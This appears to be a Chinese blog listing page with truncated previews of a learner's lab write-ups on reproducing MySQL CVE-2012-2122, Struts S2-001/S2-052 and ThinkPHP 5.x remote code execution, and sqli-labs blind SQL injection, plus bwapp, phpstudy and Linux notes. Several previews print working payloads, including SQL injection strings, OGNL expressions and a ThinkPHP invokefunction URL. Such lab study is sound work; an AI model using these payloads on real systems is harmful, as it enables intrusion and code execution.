- 博客(13)
- 收藏
- 关注
原创 Mysql 身份认证绕过漏洞(CVE-2012-2122)
漏洞原理:当连接 MariaDB / MySQL 时,输入的密码会与期望的正确密码比较,由于不正确的处理,会导致即便是memcmp()返回一个非零值,也会使 MySQL 认为两个密码是相同的。也就是说,只要知道用户名,不断尝试就能够直接登入 SQL 数据库。修复:对数据库进行升级打补丁;在防火墙上关闭mysql端口1.环境搭建使用nmap扫描使用nmap 对靶机进行扫描,查看所开放的端口,以及扫描数据库的版本信息masscan --rate=10000 --ports 0-...
2022-04-24 16:19:05
2929
原创 时间型盲注(sqli第九关)
求闭合字符根据测试,发现只有是单引号时,sleep函数才起作用,因此可以判断出来是单引号闭合字符2.求数据库名长度and if(length(database())=8,sleep(5),1) -- -数据库名的长度为83.求数据库名对应的ASCII值and if(ascii(substr((select database()),1,1))=115,sleep(5),1) -- -数据库名第一个字符的ASCII值为115 s4.求表的数量and if((sel.
2022-04-20 20:13:42
330
原创 布尔型盲注(sqli第八关)
1.求闭合字符由此可以判断是单引号闭合字符2.求当前数据库名的长度 二分法?id=1’ and length(database())=8 数据库名的长度为83.求当前数据库名对应的ASCII值?Id=1’ and ascii(substr(database(),1,1))=115 数据库名第一个字符对应的ASCII值为 115 s数据库名第二个字符对应的ASCII值为101 e...
2022-04-20 15:52:42
3277
原创 复现S2-052远程代码执行漏洞
1.启动环境 docker-compose up -d 2.查找Ubuntu ip3.burpsuite进行抓包4.发送以下数据包POST /orders/3 HTTP/1.1Host: 192.168.81.168:8080Content-Length: 2419Cache-Control: max-age=0Upgrade-Insecure-Requests: 1Origin: http://192.168.81.168:8080Conten..
2022-04-18 13:00:09
661
原创 安装bwapp漏洞实验环境
1.查找bwapp镜像docker search bwapp2.启动容器docker run --name bwapp -d -p 80:80 raesene/bwapp3.浏览器进行访问4.点击here 进行安装5.默认Login:bee,Password:bug;点击login
2022-04-17 22:28:50
525
原创 复现S2-001远程代码执行漏洞
1.对漏洞进行测试,首先在password地方输入%{1+1}点击submit之后,发现password 显示为2,证明漏洞存在2.获取tomcat执行路径:%{"tomcatBinDir{"+@java.lang.System@getProperty("user.dir")+"}"}tomcatBinDir{/usr/local/tomcat}3.获取Web路径:%{#req=@org.apache.struts2.ServletActionContext.
2022-04-16 21:06:32
180
原创 复现Thinkphp5 5.0.22/5.1.29远程代码执行漏洞
1.使用以下payload获取phpinfo:/index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=-12.构造要执行的payload,获取网站目录文件:/index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&
2022-04-16 12:58:57
2993
原创 复现ThinkPHP5 5.0.23远程代码执行漏洞
搜索ThinkPHP5.0.23相关漏洞2.发现了 5.0.23Remote Code Execution(远程代码执行漏洞)将该漏洞cp到tp.txt文件并查看3.burpsuite进行抓包4.执行命令5.写入phpinfo:`echo "<?php phpinfo(); ?>" > /var/www/public/phpinfo.php`6.查看是否写入:7.访问http://159.75.16.25:8...
2022-04-15 23:44:55
402
原创 使用phpstudy搭建网站
1.将upload文件放入PHPstudy下的www文件下2.配置站点域名设置3.重启PHPstudy之后,网站就搭建成功了
2022-04-15 23:03:56
2276
原创 Linux的常用命令1.13
一、Linux目录结构讲解1.Linux的系统目录结构特点1)一切从根开始,“/”是所有目录的起点2)访问根目录,也可能是在访问完全不同的分区或不同的磁盘;分区或者磁盘是挂载在根上的2.目标层次目录层次标准FHS(Filesystem Hierarchy Standard),是Linux的目录规范标准/etc /:存放系统配置文件的目录3.网卡配置文件/etc/sysconfig/network-scripts/ifcfg-eth0:网卡配置文件4.网络管理ifcon
2022-01-13 17:45:08
163
原创 Linux的常用命令(初学者笔记)
一、部署Centos7.5注意事项1.IP地址设置要与VM软件中的IP地址在同一个网关2.NAT网络模式==网络地址转换//物理机可以上网,利用物理机的IP地址进行IP地址的转换功能,让VM软件中的操作系统可以上网二、Linux系统组成1.Linux内核内核是操作系统的核心,提供很多基本功能2.shell提供了用户与内核进行交互操作的一种接口。shell也是一种编程语言它具有普通编程语言的很多特点。3.文件系统文件系统是文件存放在磁盘等存储设备上的组织方法。4.应用程
2022-01-12 20:25:30
201
空空如也
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人